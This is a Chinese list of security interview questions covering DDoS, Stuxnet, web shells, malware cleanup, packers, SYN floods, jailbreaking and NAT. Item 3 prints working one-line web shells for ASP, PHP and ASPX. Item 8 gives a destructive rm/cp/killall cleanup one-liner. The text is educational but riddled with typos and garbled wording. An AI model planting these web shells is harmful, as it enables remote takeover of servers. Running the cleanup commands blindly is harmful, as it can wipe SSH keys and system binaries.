信息安全面试题(二)
1、ssh Secure Shell 的缩写,
DDOS 分布式决绝服务(DDOS:Distributed Denial of service)攻击,借助客户端和服务器技术 ,将多个极端及联合起来作为攻击平台,对一个或者多个目标发动DDOS攻击,从而成倍的提高拒绝服务攻击等能力,攻击者使用一个偷窃账号将DDOS主控程序安装到一个计算机上,在一定的事件主控程序与大量代理程序通讯,代理程序已经被安装在网络上的很多计算机上,代理程序收到指令时 发动很多攻击,利用客户端客户服务技术,主控程序在几秒钟内激活上千次代理程序运行。
2、震网病毒
指的是一种蠕虫病毒,是第一个专门指向真实世界中的病毒,水电站,国家电网,只要电脑操作员将病毒感染的U盘,USB接口,这种病毒会取得工业电脑系统的控制权。 这种病毒可以破坏工业控制系统无需借助网络传播,不一窃取信息为目的。
3、一句话木马
ASP : <%execute(request("values"))%>
php: <?php@eval($_POST[value]);?>
变形 <?php$x=$_get['z'];@eval("$x;");?>
aspx一句话木马:
<%@Page Language="Jscript"%>
<%eval(Request.Item["Value"])%>
4、手工查询后门和木马的小技巧
首先输入msconfig 开启动项中查看程度列表中的这在运行的列表。后门木马大多都会为自己的系统服务注册,达到开机启动的目的,找到之后打开对应的路径之间删除,找到程序文件,直接删除并禁止子启动。
查看,系统关键目录System32和系统目录Windows下的文件,查看网络连接是否正常运行开启的端口号, 或者360流量监控,特别注意远程连接的端口号,8000是灰鸽子默认的端口,病毒查杀工具进行查杀
5、脱壳
壳是一段执行与原始程序之前的代码,原始成俗在加壳的过程中被压缩,加密,当加壳后的文件执行时,壳 这段代码限于原始程序运行,他把压缩加密后的代码还原成原始程序的代码,然后再把程序还原给原始代码,软件的加壳分为加密可 压缩壳 伪装壳 多层壳等。目的都是为了隐藏程序的真正的OEP(入口点 防止被破解)
加壳指的是对编译好的exe dll 等文件采用加壳来进行保护,脱壳指的是将文件的外边的壳去除,活肤文件没有加壳的状态。壳出于程序作者对程序资源压缩 注册保护的目的。把壳分为压缩壳 加密壳 三种,常见的压缩手段包括 FSG ASPack UPX PELock 幻影 等,密码壳使用的不多 ,加密的壳程序只有在正确输入密码之后才会运行
6、人肉搜索
是一种类似比的称呼,主要用来区别传统的搜索引擎。
SYN Flood 的基本原理
SYN Flood 是当前最流行的拒绝服务攻击,利用TCP协议缺陷发送大量的TCP请求连接而耗尽。防御方法是 将服务器响应 SYN报文时间减少,或者设置SYN cookie 就是非每一个请求的连接的IP地址一个cookie,如果短时间内连续受到某个IP的重读SYN报文,就认定了攻击以后丢弃该IP地址发送的报文
但是如果攻击中者利用 SOC_Raw 随机改写IP报文中的源地址 ,则以上方式不起作用
7、手机越狱
IOS系统的越狱就是取得系统的最高权限,越狱券后的IOS系统本身不会发生本质上的改变 只是
越狱之后手机的操作性更加强大,可以修改手机的内容,安装免费破解的软件自定义功能 美化
越狱之后可绕过 AppStore 下载应用程序 ,同时后台程序运行 周免等主题都会增加耗电量 越狱技术打破IOS的系统封闭 所以手机相对不安全。
8、主机入侵 如何解决
病毒木马的排除 :
使用netstat查看网络连接,分析是否有可疑发送行为,如有则停止。 (linux常见木马,清理命令chattr -i /usr/bin/.sshd; rm -f /usr/bin/.sshd; chattr -i /usr/bin/.swhd; rm -f /usr/bin/.swhd; rm -f -r /usr/bin/bsd-port; cp /usr/bin/dpkgd/ps /bin/ps; cp /usr/bin/dpkgd/netstat /bin/netstat; cp /usr/bin/dpkgd/lsof /usr/sbin/lsof; cp /usr/bin/dpkgd/ss /usr/sbin/ss;rm -r -f /root/.ssh; rm -r -f /usr/bin/bsd-port;find /proc/ -name exe | xargs ls -l | grep -v task |grep deleted| awk '{print $11}' | awk -F/ '{print $NF}' | xargs killall -9;)
使用杀毒软件进行查杀 使用服务器漏洞扫描软件进行查杀 查看服务器是否有异地登录
9、网络地址转换 协议
内网计算机以内网NAT(网络地址转换)协议,通过一个公共网关访问Internet,内网的计算机可以向internet 上
内网的计算机可以与公网的地址相互转化,将大量的内网IP地址转换成为一个少量的公网IP地址,减少公网IP地址的占用,NAT的最典型的应用是,在一个局域网内,只需要一台计算机连接上互联网上,就可以利用NAT共享Internet,使用局域网内的计算机可以访问互联网上的计算机,但是 Internet上的计算机无法访问局域网内部的计算机